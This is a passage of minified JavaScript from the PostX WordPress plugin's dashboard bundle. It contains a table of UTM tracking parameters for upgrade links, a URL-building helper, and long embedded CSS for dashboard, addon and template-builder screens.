dashboard"},blockProLay:{source:"db-postx-editor",medium:"pro-layout",campaign:"postx-dashboard"},wizardPatternPro:{source:"db-postx-wizard",medium:"core_features-patterns",campaign:"postx-dashboard"},wizardStaterPackPro:{source:"db-postx-wizard",medium:"core_features-SP",campaign:"postx-dashboard"},slider_2:{source:"db-postx-editor",medium:"slider2-pro",campaign:"postx-dashboard"},advanced_search:{source:"db-postx-editor",medium:"adv_search-pro",campaign:"postx-dashboard"},customFont:{source:"db-postx-editor",medium:"custom-font",campaign:"postx-dashboard"},dc:{source:"db-postx-editor",medium:"acf-pro",campaign:"postx-dashboard"},postx_dashboard_settings:{source:"db-postx-setting",medium:"upgrade-pro-sidebar",campaign:"postx-dashboard"},postx_dashboard_tutorials:{source:"db-postx-tutorial",medium:"tutorials-upgrade_to_pro",campaign:"postx-dashboard"},postx_dashboard_tutorialsdocs:{source:"db-postx-tutorial",medium:"tutorials-doc",campaign:"postx-dashboard"},menu_save_temp_pro:{source:"db-postx-save-template",medium:"popup-upgrade",campaign:"postx-dashboard"},settingsFR:{source:"db-postx-setting",medium:"settings-upgrade-pro",campaign:"postx-dashboard"},tutorialsFR:{source:"db-postx-tutorial",medium:"tutorials-FR",campaign:"postx-dashboard"},editor_darklight:{source:"db-postx-editor",medium:"darklight-pro",campaign:"postx-dashboard"},final_hour_sale:{source:"db-postx-hellobar",medium:"final-hour-sale",campaign:"postx-dashboard"},massive_sale:{source:"db-postx-hellobar",medium:"massive-sale",campaign:"postx-dashboard"},flash_sale:{source:"db-postx-hellobar",medium:"flash-sale",campaign:"postx-dashboard"},exclusive_deals:{source:"db-postx-hellobar",medium:"exclusive-deals",campaign:"postx-dashboard"},black_friday_sale:{source:"db-postx-hellobar",medium:"black-friday",campaign:"postx-dashboard"},new_year_sale:{source:"db-postx-hellobar",medium:"new-year-sale",campaign:"postx-dashboard"}},r=e=>{const{url:t,utmKey:n,affiliate:r,hash:o}=e,i=new URL(t||"https://www.wpxpo.com/postx/"),l=a[n];return l&&(i.searchParams.set("utm_source",l.source),i.searchParams.set("utm_medium",l.medium),i.searchParams.set("utm_campaign",l.campaign)),r&&i.searchParams.set("ref",r),o&&(i.hash=o.startsWith("#")?o:`#${o}`),i.toString()}},6511:(e,t,n)=>{"use strict";n.d(t,{Z:()=>u});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o),l=n(1667),s=n.n(l),p=new URL(n(4975),n.b),c=i()(r()),d=s()(p);c.push([e.id,`.ultp-gettingstart-message{display:grid;grid-template-columns:440px auto;gap:30px;align-items:center;justify-content:space-between}@media only screen and (max-width: 1200px){.ultp-gettingstart-message{grid-template-columns:1fr 1fr}}.ultp-gettingstart-message .ultp-start-left{position:relative;line-height:0;height:100%}.ultp-gettingstart-message .ultp-start-left img{width:100%;height:100%;border-radius:4px}@media only screen and (max-width: 1400px){.ultp-gettingstart-message .ultp-start-left img{object-fit:cover}}.ultp-gettingstart-message .ultp-start-left .ultp-start-content{position:absolute;flex-direction:column;gap:20px;display:flex;bottom:24px;left:24px;line-height:normal}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-text{color:#fff;font-size:18px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns{display:flex;align-items:center;flex-wrap:wrap;gap:12px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-primary-button,.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{padding:10px 20px;font-size:14px;border-radius:4px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{background:unset;border:1px solid #fff;color:#fff !important;font-weight:600}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button:hover{background:unset}.ultp-gettingstart-message .ultp-start-right{display:grid;grid-template-columns:1fr 1fr;height:100%}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-start-right{grid-template-columns:1fr}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{background:#fff;padding:24px 32px;border-radius:0 4px 4px 0;display:flex;flex-direction:column;justify-content:center}@media only screen and (min-width: 1200px)and (max-width: 1360px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{padding:24px 15px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title{color:#091f36;font-size:16px;font-weight:600;margin-bottom:8px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title._pro{font-size:20px;margin-bottom:12px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description._pro{color:#070707;margin-bottom:32px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{display:none}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists{display:flex;flex-direction:column;gap:5px;margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{display:flex;align-items:center;gap:7px;color:#070707;font-weight:500;font-size:14px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{font-size:12px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn{background:linear-gradient(180deg, #ea5e40, transparent) #e36f16;padding:12px 25px;border-radius:4px;font-size:14px;margin-bottom:15px;display:flex;align-items:center;gap:10px;width:fit-content;cursor:pointer;text-decoration:none;color:#fff}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn:hover{background:linear-gradient(180deg, #e36f16, transparent) #ea5e40}.ultp-gettingstart-message .ultp-dashborad-banner{width:100%;position:relative;line-height:0}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-dashborad-banner{display:none}}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container{max-width:25%;position:absolute;left:0;right:0;top:0;bottom:0;margin:auto;max-height:fit-content;cursor:pointer;height:fit-content}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-play-icon{max-width:100%}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-animate{-webkit-animation:pulse 1.2s ease infinite;animation:pulse 1.2s ease infinite;background:var(--postx-primary-color);position:absolute;width:100%;height:100%;left:0;right:0;top:0;bottom:0;margin:auto;border-radius:100%}.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{max-width:100%;height:100%;border-radius:4px 0 0 4px}@media only screen and (max-width: 1420px){.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{object-fit:cover}}@-webkit-keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}@keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}.ultp-dashboard-addons-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading.mt{margin-top:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading{margin-bottom:32px;color:#070707;font-size:24px;font-weight:600}.ultp-dashboard-addons-container .ultp-addon-parent-heading>span{color:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addons-grid{display:grid;justify-content:space-between;grid-template-columns:1fr 1fr;gap:30px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item{display:flex;flex-direction:column;justify-content:space-between;padding:unset !important;position:relative;overflow:hidden;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item img{height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .dashicons{height:unset;width:unset;line-height:unset;font-size:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-new-tag{font-weight:500;font-size:10px;color:#070707;padding:4px 8px;background:#ffbd42;border-radius:24px;padding:4px 8px;height:fit-content;line-height:10px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-shortcode-copy{cursor:copy}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents{padding:24px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name{display:flex;gap:12px;align-items:center;margin-bottom:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .name{font-size:20px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .ultp-addon-item-title{font-weight:500;display:flex;align-items:center;gap:8px;line-height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock{position:absolute;top:0;left:0}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock span{position:absolute;top:4px;left:2px;font-weight:600;font-size:12px;transform:rotate(315deg);color:#fff}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock::after{content:"";width:42px;height:42px;background-image:url(${d});display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-addons-container .ultp-addons-container-grid.ultp-gs{display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid .ultp-addons-items{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-addons-container .ultp-addon-item-actions{display:flex;align-items:center;justify-content:space-between;padding:16px 24px;border-top:1px solid #eaedf2}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action{display:flex;justify-content:space-between;align-items:center;gap:6px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:6px;border:1px solid #e6e6e6;padding:2px 6px;color:#6e6e6e;font-size:14px;font-weight:500;border-radius:4px;transition:400ms}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip svg{width:14px;height:14px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip:hover{color:#070707;font-weight:500;border:1px solid #070707}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons,.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action a{font-size:14px;color:#575a5d;cursor:pointer}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons-admin-collapse{transform:rotate(180deg)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting{position:relative;height:20px !important;width:20px !important;margin-left:10px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg{color:#6e6e6e;cursor:pointer;opacity:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg:hover{color:#070707}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting::before{position:absolute;left:-12px;font-size:30px;top:-13px;border-left:1px solid #eaedf2;padding-left:9px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings{width:150%;height:100vh;background-color:rgba(0,0,0,.5);position:fixed;top:0%;right:10%;transition:.5s;z-index:999}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup{height:100%;width:600px;position:fixed;z-index:99;top:32px;right:0px;margin:0 auto;border-radius:4px;box-sizing:border-box;background-color:var(--postx-white-color);box-shadow:0 1px 2px 0 rgba(8,68,129,.2);overflow-x:hidden;transition:.5s}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup::-webkit-scrollbar{display:none}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-addon-settings-title{padding:15px 20px;background:#e3f1ff;position:sticky;top:0;z-index:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form{display:flex;flex-direction:column;justify-content:space-between;height:100%;position:relative}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-body{position:relative;padding:40px 40px 30px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer{text-align:center;background:#e3f1ff;padding:16px;position:sticky;bottom:32px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading{cursor:no-drop}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addons-setting-save{color:var(--postx-white-color);cursor:pointer;width:600px;border:none;position:fixed;right:0;bottom:0;padding:10px 25px;background:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close{position:fixed;top:40px;right:11px;color:var(--postx-white-color);font-size:25px;cursor:pointer;border:none;padding:0px 9px 3px;background-color:var(--postx-dark-color);z-index:99}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close::after{content:"×"}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close:hover{background:red}.addons_promotions{margin-top:40px;border:1px solid #b9cff0;background-color:#e0ecff;padding:30px;border-radius:4px;text-align:center;font-size:16px;color:#091f36}.addons_promotions.ultp-gs{max-width:80%;margin-left:auto;margin-right:auto}.addons_promotions .addons_promotions_label{line-height:20px;font-size:16px}.addons_promotions .addons_promotions_btns{display:flex;flex-wrap:wrap;justify-content:center;gap:12px;margin-top:15px}.addons_promotions .addons_promotions_btns .addons_promotions_btn{padding:6px 12px;border-radius:4px;cursor:pointer;font-size:12px}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn1{background:#07cc92;color:#fff;text-decoration:none}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn2{background:#fff;color:#000;text-decoration:none}.ultp_dash_key_features{margin-top:60px;margin-bottom:30px}.ultp_dash_key_features .ultp_dash_key_features_content{display:grid;grid-template-columns:repeat(4, 1fr);gap:20px;margin-top:30px}.ultp_dash_key_features .ultp_dash_key_features_label{font-size:18px;font-weight:600;margin-bottom:10px;color:#091f36}.ultp_dash_key_features .ultp-description{font-size:14px}.ultp-description{color:#4a4a4a;font-size:14px}.ultp-description-notice{margin-top:5px;color:#e68429}.ultp-plugin-required{font-size:14px;text-align:center;display:inline-block;padding:20px 0px 0;color:var(--postx-warning-button-color);margin-top:-16px}@media only screen and (max-width: 1200px){.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr 1fr 1fr}}@media only screen and (max-width: 1100px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 768px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.addons_promotions.ultp-gs{max-width:100%}.ultp-gettingstart-message{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr}}@media only screen and (max-width: 425px){.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(1, 1fr)}}.ultp-addon-group{background:#fff;border-radius:8px;padding:32px}`,""]);const u=c},3038:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-blocks-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .frequency{margin-bottom:0px !important}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{margin-top:20px;display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item{display:flex;justify-content:space-between;padding:20px 15px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta{display:flex;gap:10px;align-items:center;font-size:16px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta img{height:25px;width:25px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option{display:flex;align-items:center;gap:10px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option a{text-decoration:none}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:3px;font-size:14px;color:#575a5d}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip .dashicons{height:unset;width:unset;line-height:unset;font-size:14px;color:#575a5d}@media only screen and (max-width: 1350px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 990px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr}}",""]);const l=i},725:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-builder-dashboard__content{width:100%;margin:0;display:grid;grid-template-columns:200px 1fr}.ultp-builder-dashboard__content .ultp-builder-tab__content{display:flex;flex-direction:column;justify-content:flex-start}.ultp-builder-dashboard__content .ultp-builder-tab__content .ultp-tab__content{height:100%}.ultp-builder-tab__option{background:#edf6ff;border:1px solid rgba(3,127,255,.03);min-height:100vh;border-radius:4px 0 0 4px}.ultp-builder-tab__option ul{padding:0px;margin:0px}.ultp-builder-tab__option ul li{font-size:14px;cursor:pointer;color:#091f36;padding:12px 0px 12px 30px;display:flex;align-items:center;transition:400ms}.ultp-builder-tab__option ul li.active,.ultp-builder-tab__option ul li.active *{color:var(--postx-primary-color);background-color:var(--postx-white-color)}.ultp-builder-tab__option ul li:hover,.ultp-builder-tab__option ul li:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__option ul li img{margin-right:8px;height:20px;text-align:left}.ultp-builder-tab__option ul li span{margin-right:8px;font-size:24px;text-align:left;display:block;line-height:1;height:auto}.ultp-builder-tab__option ul ul li{padding-left:50px}.ultp-builder-tab__option .ultp-popup-sync{font-size:14px;cursor:pointer;display:flex;align-items:center;transition:400ms;padding:12px 0px 12px 30px;margin-bottom:0}.ultp-builder-tab__option .ultp-popup-sync i{margin-right:4px;font-size:25px;height:auto;width:auto}.ultp-builder-tab__option .ultp-popup-sync:hover,.ultp-builder-tab__option .ultp-popup-sync:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__content .ultp-builder-tab__heading{display:flex;align-items:center;justify-content:space-between;padding:0 0 20px 30px;max-height:30px}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title .heading{display:inline-block;font-size:18px;text-transform:capitalize}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span{margin-right:20px;padding-right:20px;border-right:1px solid #575a5d;font-size:18px;cursor:pointer;color:#575a5d}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span svg{height:12px;width:14px;color:#575a5d;margin-right:5px}.ultp-builder-tab__content .ultp-tab__content{display:none !important;opacity:0;transition:.3s;padding:30px;background:var(--postx-white-color);border-radius:0 4px 4px 0;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-builder-tab__content .ultp-tab__content.active{display:block !important;opacity:100;transition:.3s}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab{display:flex;flex-direction:column;gap:20px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper{background:#f6f8fa;padding:15px 20px 15px 20px;border-radius:4px;border:solid 1px #eaedf2}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading{display:flex;align-items:center;flex-wrap:wrap;gap:15px;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta{display:flex;gap:15px;color:#172c41}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div{font-size:14px;font-weight:normal;margin:0px !important}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div>span{font-weight:600;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__content div{display:flex;align-items:center;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control{display:flex;gap:12px;position:relative;min-height:26px;align-items:center}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a{text-decoration:none;font-size:13px;color:#575a5d;display:flex;align-items:center;justify-content:center;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a span{font-size:12px;color:#091f36;height:auto}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a.status{min-width:56px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-dashboard__action{line-height:1.2;cursor:pointer}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active{position:absolute;top:52px;cursor:pointer;right:-20px;padding:10px 36px;background:#f9f9f9;box-shadow:4px 6px 12px -10px #000;z-index:9999}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active .dashicons{font-size:18px;top:3px;position:relative}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-condition__edit{padding:5px 10px;border-radius:2px;font-size:12px;border:none;color:#fff;cursor:pointer;background-color:#091f36}.ultp-builder-tab__content .ultp-builder-items{display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-builder-tab__content .ultp-builder-items .newScreen{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo{padding:8px 12px;border-bottom:solid 1px #eaedf2;text-transform:capitalize;margin-bottom:12px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo .ultp_h6{font-size:16px;font-weight:500}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays{height:250px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays img{height:100%;object-fit:fill}.premadeScreen .ultp-item-list{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.premadeScreen .ultp-item-list .listInfo{padding:10px;display:flex;justify-content:space-between;align-items:center;border-bottom:solid 1px #eaedf2;text-transform:capitalize;flex-wrap:wrap;row-gap:10px}.premadeScreen .ultp-item-list .listInfo .title{font-size:14px;color:#091f36;font-weight:500}.premadeScreen .ultp-item-list .listInfo .title .parent{font-weight:400;font-size:12px;color:rgba(9,31,54,.67)}.premadeScreen .ultp-item-list .listInfo .btnImport{display:flex;align-items:center;border-radius:4px;background-image:linear-gradient(#18dd5c, #0c8d20);padding:5px 10px;color:#fff;font-size:12px}.premadeScreen .ultp-item-list .listInfo .btnImport svg{height:12px;color:#fff;margin-right:6px}.premadeScreen .ultp-item-list .listInfo .btnImport span{color:#fff}.premadeScreen .ultp-item-list .listInfo .ultp-upgrade-pro-btn{font-size:12px;padding:5px 10px}.premadeScreen .ultp-item-list .listOverlay{box-sizing:border-box;position:relative;line-height:0;padding:10px}.premadeScreen .ultp-item-list .listOverlay img{border-radius:4px}.premadeScreen.ultp-builder-items.ultpheader .bg-image-aspect,.premadeScreen.ultp-builder-items.ultpfooter .bg-image-aspect{aspect-ratio:1.8}.premadeScreen.ultp-builder-items.ultpheader .ultp-list-blank-img img,.premadeScreen.ultp-builder-items.ultpfooter .ultp-list-blank-img img{max-height:190px}.premadeScreen.ultp-builder-items.ultpheader .dashicons-visibility,.premadeScreen.ultp-builder-items.ultpfooter .dashicons-visibility{font-size:50px}.ultp-builder-items .ultp-item-list img{width:100%;max-width:100%}.ultp-item-list{position:relative}.ultp-premade-item{transition:.3s}.ultp-premade-item:hover{box-shadow:1px 4px 18px -12px #000}.ultp-list-white-overlay{cursor:pointer;font-weight:600;width:100%;height:100%;justify-content:center;align-items:center;top:0;left:0;position:absolute;display:flex;align-items:center;color:var(--postx-primary-color);font-size:12px}.ultp-list-white-overlay .dashicons{margin-right:15px;font-size:32px;display:block;height:auto;color:var(--postx-primary-color)}.ultp-condition-wrapper{z-index:100000;position:fixed;top:0;left:0;width:100%;height:100%;display:flex;justify-content:center;align-items:center;background:rgba(0,0,0,.7)}.ultp-condition-wrapper .ultp-condition-popup{max-width:700px;width:100%;position:relative;background:#fff;padding:40px 60px;border-radius:4px;height:fit-content;max-height:90%;overflow:unset !important;margin:50px auto 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close{position:absolute;top:0;right:-52px;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close svg{color:#000}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover{background:red}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover svg{color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content{display:flex;gap:30px;align-items:center;justify-content:center;flex-wrap:wrap;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap{height:450px;width:100%;display:flex;flex-direction:column;align-items:center;overflow-y:scroll !important;-ms-overflow-style:none;scrollbar-width:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap-heading{margin-bottom:14px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-items{width:600px;margin-top:20px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .btnCondition{margin-top:20px;color:#fff;border-radius:4px;background-color:#091f36;padding:8px 16px;border:none;cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel{cursor:pointer;position:absolute;right:-30px;color:#de1010;font-size:24px;line-height:.7;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel:hover{color:#c00a0a}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields,.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{display:flex;align-items:center;position:relative;width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{background:#fff;margin-top:15px;border:1px solid #eaedf2;border-radius:2px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields{padding:0px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select{color:#575a5d;border:none;margin-right:0;padding-top:7px;padding-bottom:7px;border-right:1px solid #eaedf2;border-radius:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select:last-child{border-right:none;width:100%;max-width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label{display:inline-flex;align-items:center;background:#7c8084;padding:4px 